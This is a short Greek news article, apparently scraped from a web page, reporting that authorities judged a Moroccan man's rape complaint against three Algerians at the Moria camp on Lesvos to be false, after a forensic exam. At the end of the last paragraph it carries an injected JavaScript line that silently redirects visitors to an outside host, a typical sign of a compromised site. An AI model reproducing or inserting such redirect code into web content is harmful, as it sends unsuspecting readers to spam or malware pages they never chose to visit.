Ψευδής η καταγγελία για τον βιασμό του Μαροκινού στη Μόρια

0
3

 

Ανακριτής και εισαγγελέας έκριναν πως δεν στοιχειοθετουνται οι κατηγορίες εναντίον των τριών Αλγερινών που είχαν συλληφθεί το περασμένο Σάββατο για βιασμό 25χρονου Μαροκινου στο hot spot της Μόριας και πως η καταγγελία είναι ψευδής.

Ο 25χρονος Μαροκινός είχε καταγγείλει ότι οι τρεις Αλγερινοί τον είχαν καλέσει να πιούν καφέ και να συζητήσουν. Στη διάρκεια της συζήτησης, και σύμφωνα πάντα με την καταγγελία, οι τρεις άνδρες τού έριξαν στον καφέ κάποια ουσία, η οποία του προκάλεσε υπνηλία. Στη συνέχεια, όπως ισχυρίστηκε ο Μαροκινός, οι Αλγερινοί μπήκαν στη σκηνή του, έκλεψαν τα χρήματά του, περίπου 370 ευρώ και τον βίασαν ενώ εκείνος ήταν ναρκωμένος.

Η καταγγελία, σύμφωνα με όσα γράφει η εφημερίδα «Δημοκράτης» της Μυτιλήνης, προκάλεσε αμφιβολίες στις αστυνομικές Αρχές, ιδιαίτερα όταν ο 25χρονος αρνήθηκε κατηγορηματικά να υποβληθεί σε ιατροδικαστική εξέταση, με το αιτιολογικό ότι δεν του το επιτρέπουν οι θρησκευτικές του πεποιθήσεις.

Τελικά, πείστηκε και εξετάσθηκε από ιατροδικαστή, ο οποίος έκρινε πως δεν υπήρχαν ίχνη σεξουαλικής κακοποίησης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here